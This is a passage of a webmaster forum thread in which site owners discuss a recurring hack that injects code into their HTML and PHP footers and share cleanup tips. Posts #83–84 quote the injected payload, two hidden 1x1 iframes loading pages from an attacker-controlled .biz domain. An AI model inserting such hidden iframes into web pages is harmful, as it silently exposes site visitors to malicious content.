HACKED! by megacount.net

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • JOHNNY_BUTTHOLES
    Confirmed User
    • Jun 2006
    • 146

    #51
    Originally posted by emthree
    Yes, it was inserted into both of my footer files.
    bottom1.html and bottom2.html
    is it gone or is it still showing up?

    Comment

    • emthree
      Dialer Kingpin
      • Jun 2003
      • 10816

      #52
      Originally posted by RevSand
      This does not seem to be a webair OR wordpress issue since I also have been hit and do not use either...
      The plot thickens.
      I bet the guy behind it all, is reading this and laughing at us.

      Sell Patches & Pills

      Comment

      • emthree
        Dialer Kingpin
        • Jun 2003
        • 10816

        #53
        Originally posted by JOHNNY_BUTTHOLES
        is it gone or is it still showing up?
        Since I removed it, I have not seen it back... yet.
        How about you? What happened when you removed it?

        Sell Patches & Pills

        Comment

        • chaze
          Confirmed User
          • Aug 2002
          • 9774

          #54
          Have you host run a rootcheck kit on your account, there may be backdoors still. Also have them to a search for that name in all your files from the command line.
          Like the desert needs the rain
          We do fully manged WordPress, VPS, and Servers. Adult Host Pro https://adulthostpro.com/ Since 2001

          Comment

          • JOHNNY_BUTTHOLES
            Confirmed User
            • Jun 2006
            • 146

            #55
            Originally posted by emthree
            Since I removed it, I have not seen it back... yet.
            How about you? What happened when you removed it?
            as i said i went through all my files (php, html) on all my sites. i found it on non-wordpress sites attached to regular php footers. i deleted it and changed the permissions to read only. it hasn't shown back up... yet.

            i'm not on webair either.

            Comment

            • bigalownz
              Confirmed User
              • Aug 2005
              • 1657

              #56
              Originally posted by emthree
              Did/do you have wordpress installed on that site?
              no

              nothing at all no scipts etc just plan text

              i deleted the page and put a new one up and a few days later it was back

              i notice it only went on to index.html
              $100 free credit for all hosting needs

              Comment

              • emthree
                Dialer Kingpin
                • Jun 2003
                • 10816

                #57

                Sell Patches & Pills

                Comment

                • McCord
                  Registered User
                  • Dec 2005
                  • 9

                  #58
                  Originally posted by Superterrorizer
                  You are going to switch hosts because you didn't keep your scripts up to date and your out dated insecure scripts are being exploited? Unless that service is part of your contract or SLA it's YOUR responsibility to keep your scripts up to date, not your hosts.

                  While many potential security threats both known and unknown can be blocked, many cannot. If your server gets hacked via an exploit in the OS or an application (apache, php, mysql, etc) then it's your hosts fault (Unless you are unmanaged/colo). If one of your sites gets hacked/defaced due to you not keeping your scripts up to date, it's your fault.


                  Switching hosts isn't going to magically update all your scripts and fix your security problems.

                  This guy/gal has it just about right. I work for a hosting provider and I've had to deal with this the past few days. Anyhow - here is a TIP:

                  STRONG PASSWORDS

                  it looks like your "hacker" is harvesting passwords (most likely insecure and very weak ones at that) and so far - the offending IP appears as (i've seen the same IP on 2 servers so far):

                  12.219.246.180

                  Ask your hosting provider (if you don't know how) to block all access from that IP and change ALL passwords on your system.

                  Comment

                  • bigalownz
                    Confirmed User
                    • Aug 2005
                    • 1657

                    #59
                    looks like Naughty america has had the problem too

                    there my friends hot mom members area has it too now

                    looks like its a big problem for all
                    $100 free credit for all hosting needs

                    Comment

                    • Machete_
                      WINNING!
                      • Oct 2002
                      • 14579

                      #60
                      Some say its a hole in PhP itself, other say its in cpanel. in any case its = root access

                      Comment

                      • Gillespie
                        Confirmed User
                        • Aug 2006
                        • 1391

                        #61
                        I have like a 25 char pass for my root account. All letter, numbers and punctuation marks, mixed caps, etc...

                        I hope I'm safe. :P
                        Blue Design Studios
                        My choice for web design.
                        Click this to see why.


                        Get a REAL host. Try JaguarPC.

                        294-659-259

                        Comment

                        • Machete_
                          WINNING!
                          • Oct 2002
                          • 14579

                          #62
                          Originally posted by Gillespie
                          I have like a 25 char pass for my root account. All letter, numbers and punctuation marks, mixed caps, etc...

                          I hope I'm safe. :P
                          If they use a exploit in Cpanel or PhP as mentioned, they dont need your account.

                          Comment

                          • Gillespie
                            Confirmed User
                            • Aug 2006
                            • 1391

                            #63
                            Yeah, I know. I just updated everything as soon as I started seeing these threads in other boards a week and a half ago, so I hope I'm clear.
                            Blue Design Studios
                            My choice for web design.
                            Click this to see why.


                            Get a REAL host. Try JaguarPC.

                            294-659-259

                            Comment

                            • facialfreak
                              Confirmed User
                              • Feb 2005
                              • 3018

                              #64
                              http://www.securityfocus.com/bid/14088/solution

                              http://www.securityfocus.com/bid/14088/solution

                              http://www.securityfocus.com/bid/14088/solution

                              http://www.securityfocus.com/bid/14088/solution

                              http://www.securityfocus.com/bid/14088/solution

                              http://www.securityfocus.com/bid/14088/solution

                              Managed Shared Hosting starting at $4.99/mo
                              Managed VPS starting at $29.99/mo


                              Comment

                              • Gillespie
                                Confirmed User
                                • Aug 2006
                                • 1391

                                #65
                                Woot! I was clear anyway =)
                                Blue Design Studios
                                My choice for web design.
                                Click this to see why.


                                Get a REAL host. Try JaguarPC.

                                294-659-259

                                Comment

                                • boneprone
                                  Hall Of Fame
                                  • Jan 2001
                                  • 34415

                                  #66
                                  Seems I got hacked today..

                                  Would like if someone could shed some light on this on how they got in..

                                  icq 66883099

                                  Industry Hall Of Fame Legend Mike Jones
                                  Bow to the Power - Still BP4L
                                  http://gfyawards.com/hall-of-fame
                                  Learn about it kids.

                                  Comment

                                  • Machete_
                                    WINNING!
                                    • Oct 2002
                                    • 14579

                                    #67
                                    Originally posted by boneprone
                                    Seems I got hacked today..

                                    Would like if someone could shed some light on this on how they got in..

                                    icq 66883099
                                    dissipate posted these two pretty usefull links
                                    http://www.securiteam.com/unixfocus/6R0030UH5W.html
                                    http://www.securiteam.com/unixfocus/6M00315H5S.html

                                    Im my case (webair hosted) it was through cpanel

                                    Comment

                                    • boneprone
                                      Hall Of Fame
                                      • Jan 2001
                                      • 34415

                                      #68
                                      Jupiter is looking into it now.

                                      Not sure how he got in..

                                      Looks like he just walked right in by logging in with a password.

                                      Industry Hall Of Fame Legend Mike Jones
                                      Bow to the Power - Still BP4L
                                      http://gfyawards.com/hall-of-fame
                                      Learn about it kids.

                                      Comment

                                      • Sosa
                                        In Tushy Land
                                        • Oct 2002
                                        • 40149

                                        #69
                                        I noticed this on one of the sites I had a hardlink trade with this morning. Bad news.

                                        Comment

                                        • Machete_
                                          WINNING!
                                          • Oct 2002
                                          • 14579

                                          #70
                                          Originally posted by boneprone
                                          Jupiter is looking into it now.

                                          Not sure how he got in..

                                          Looks like he just walked right in by logging in with a password.

                                          that is what happends when your password is:
                                          From The Nectar Of The Bone Flows All That Clicks

                                          Comment

                                          • CaptainHowdy
                                            Too lazy to set a custom title
                                            • Dec 2004
                                            • 94735

                                            #71
                                            Originally posted by dissipate
                                            Most adult servers lack even basic security measures. It's like shooting fish in a barrel.
                                            !!

                                            Comment

                                            • emthree
                                              Dialer Kingpin
                                              • Jun 2003
                                              • 10816

                                              #72
                                              Originally posted by boneprone
                                              Jupiter is looking into it now.

                                              Not sure how he got in..

                                              Looks like he just walked right in by logging in with a password.
                                              I dont think that's the case. I had webair look at my logs, and they said they did not see anything funny.
                                              Let us know what Jupiter says though.

                                              Sell Patches & Pills

                                              Comment

                                              • bigalownz
                                                Confirmed User
                                                • Aug 2005
                                                • 1657

                                                #73
                                                just a qestion

                                                do you use awstats ???
                                                $100 free credit for all hosting needs

                                                Comment

                                                • JD
                                                  Too lazy to set a custom title
                                                  • Sep 2003
                                                  • 22651

                                                  #74
                                                  bump for a fucking solution. got hit again just now

                                                  Comment

                                                  • Kimo
                                                    ...
                                                    • Jan 2006
                                                    • 11542

                                                    #75
                                                    theyve been hitting everyone lately
                                                    ...

                                                    Comment

                                                    • RyanL
                                                      Confirmed User
                                                      • Feb 2003
                                                      • 1145

                                                      #76
                                                      ne1? ne1?
                                                      ICQ: #126013016 :: Amateur Index

                                                      Comment

                                                      • ladida
                                                        Confirmed User
                                                        • Nov 2005
                                                        • 2179

                                                        #77
                                                        Most of you probably didn't even clean your sites so they don't even need another access.
                                                        agentGFY *at* gmail.com

                                                        Comment

                                                        • Verbal
                                                          Confirmed User
                                                          • Dec 2001
                                                          • 3420

                                                          #78
                                                          erased the virus and changed my password ... haven't had a problem since

                                                          Comment

                                                          • Ace_luffy
                                                            www.creationcrew.com
                                                            • Feb 2005
                                                            • 12164

                                                            #79
                                                            any proofs


                                                            ++ Adult and Mainstream Websites Designs | 10 banners for only $50 | html5 Banners ++
                                                            email : [email protected] Telegram : https://t.me/creationcrew WhatsApp : +63 956 420 4819 | HTML5/Responsive Site - Div/CSS - ElevatedX - NATs - Wordpress

                                                            Comment

                                                            • JD
                                                              Too lazy to set a custom title
                                                              • Sep 2003
                                                              • 22651

                                                              #80
                                                              Originally posted by Verbal
                                                              erased the virus and changed my password ... haven't had a problem since
                                                              i've done that about 10 times and it keeps happening

                                                              Comment

                                                              • HEAT
                                                                Confirmed User
                                                                • Sep 2003
                                                                • 2255

                                                                #81
                                                                still under hitting.
                                                                254-282-542

                                                                Comment

                                                                • drjones
                                                                  Confirmed User
                                                                  • Oct 2005
                                                                  • 908

                                                                  #82
                                                                  Originally posted by SPeRMiNaToR
                                                                  i've done that about 10 times and it keeps happening
                                                                  It really sucks.. but if your servers been compromised the only 100% solution is to wipe it an reinstall from scratch. If theyve had root access to your machine, they can do ANYTHING.
                                                                  ICQ: 284903372

                                                                  Comment

                                                                  • pornpf69
                                                                    Too lazy to set a custom title
                                                                    • Jun 2004
                                                                    • 15782

                                                                    #83
                                                                    <iframe src='http://fdghewrtewrtyrew.biz/adv/168/new.php' width=1 height=1></iframe>
                                                                    <iframe src='http://fdghewrtewrtyrew.biz/adv/new.php?adv=168' width=1 height=1></iframe>

                                                                    Comment

                                                                    • JD
                                                                      Too lazy to set a custom title
                                                                      • Sep 2003
                                                                      • 22651

                                                                      #84
                                                                      Originally posted by pornpf69
                                                                      <iframe src='http://fdghewrtewrtyrew.biz/adv/168/new.php' width=1 height=1></iframe>
                                                                      <iframe src='http://fdghewrtewrtyrew.biz/adv/new.php?adv=168' width=1 height=1></iframe>

                                                                      yep that's it. there's a new random char .net domain in the mix as well now

                                                                      Comment

                                                                      • pornpf69
                                                                        Too lazy to set a custom title
                                                                        • Jun 2004
                                                                        • 15782

                                                                        #85
                                                                        Originally posted by SPeRMiNaToR
                                                                        yep that's it. there's a new random char .net domain in the mix as well now
                                                                        I had the same isue on my server....I kept that just for the records....heheeh they only infect some of the files....at random....

                                                                        Comment

                                                                        • JD
                                                                          Too lazy to set a custom title
                                                                          • Sep 2003
                                                                          • 22651

                                                                          #86
                                                                          buuuuump just got hit AGAIN today

                                                                          Comment

                                                                          Working...